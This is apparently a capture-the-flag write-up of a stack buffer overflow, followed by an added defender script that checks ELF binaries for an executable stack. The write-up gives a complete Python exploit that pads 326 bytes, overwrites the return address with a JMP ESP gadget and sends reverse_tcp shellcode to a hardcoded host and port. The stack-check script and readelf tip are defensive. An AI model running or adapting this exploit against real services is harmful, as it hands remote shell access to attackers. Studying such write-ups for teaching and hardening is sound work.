We attached to the process with gdb and sent the program a pattern so we could figure out the offset of the return address we were overwriting and got an offset of 326 bytes. Now to figure out what to return to.
Turns out that the stack was executable and there was a convenient 'JMP ESP' sittin' around at address 0x08048F47, so we overwrote the return address with the jmp esp and then popped in some nice reverse_tcp shellcode and won! Our win.py is posted below.
import socket, binascii

# For our pattern generator
#alph = 'abcefghijklmnopqrstuvwxyz'

def recv(s):
    # Read and show whatever the service sends back (banner, prompt, etc.)
    print s.recv(1024)

def endian(s):
    # Turn a hex address string into its little-endian byte order
    if len(s) < 8:
        s = s.zfill(8)
    return s[6:8]+s[4:6]+s[2:4]+s[0:2]

s = socket.socket()
s.connect(('128.238.66.218', 4842))
recv(s)

win = 'a'*326                                     # padding up to the saved return address
win += binascii.unhexlify(endian('08048f47'))     # overwrite it with the JMP ESP address
win += open('payload').read()+'\n'                # reverse_tcp shellcode, which ESP points at after the ret

# A simple pattern generator
#for i in alph:
#    for j in range(0,10):
#        breaker += i + str(j)

print win, len(win)
s.sendall(win)
recv(s)
-- suntzu_II
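The JMP ESP trick only worked because the target's stack was executable. As an added defender-side check (my code, not part of the writeup above), the following script reads an ELF's PT_GNU_STACK program header and reports whether the loader would map the stack executable; the two sample ELF32 images are constructed inline so it runs without the target binary.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # GNU extension: describes the stack's required permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def stack_is_executable(elf):
    """True when the loader would map this ELF's stack executable: PF_X set on
    PT_GNU_STACK, or no PT_GNU_STACK at all (the historical x86 Linux default)."""
    if elf[:4] != b'\x7fELF':
        raise ValueError('not an ELF image')
    is64 = elf[4] == 2                # EI_CLASS: 1 = ELF32, 2 = ELF64
    e = '<' if elf[5] == 1 else '>'   # EI_DATA: 1 = little-endian, 2 = big-endian
    if is64:
        (e_phoff,) = struct.unpack_from(e + 'Q', elf, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(e + 'HH', elf, 0x36)
    else:
        (e_phoff,) = struct.unpack_from(e + 'I', elf, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(e + 'HH', elf, 0x2A)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:   # Elf64_Phdr: p_type, p_flags are the first two fields
            p_type, p_flags = struct.unpack_from(e + 'II', elf, off)
        else:      # Elf32_Phdr: p_flags sits after six 4-byte fields
            (p_type,) = struct.unpack_from(e + 'I', elf, off)
            (p_flags,) = struct.unpack_from(e + 'I', elf, off + 24)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True


def sample_elf32(stack_flags, p_type=PT_GNU_STACK):
    """Constructed minimal i386 ELF32 image: a header plus one program header."""
    ident = b'\x7fELF' + bytes([1, 1, 1, 0]) + b'\x00' * 8
    ehdr = ident + struct.pack('<HHIIIIIHHHHHH',
                               2, 3, 1, 0x08048000, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack('<IIIIIIII', p_type, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


SAMPLE_EXEC_STACK = sample_elf32(PF_R | PF_W | PF_X)   # like the writeup's target
SAMPLE_NX_STACK = sample_elf32(PF_R | PF_W)            # what -z noexecstack produces

if __name__ == '__main__':   # usage: python check_stack.py ./binary
    image = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_EXEC_STACK
    print('executable stack:', stack_is_executable(image))
```

`readelf -lW ./binary | grep GNU_STACK` gives the same answer for a real file; the script just makes the decision rule explicit.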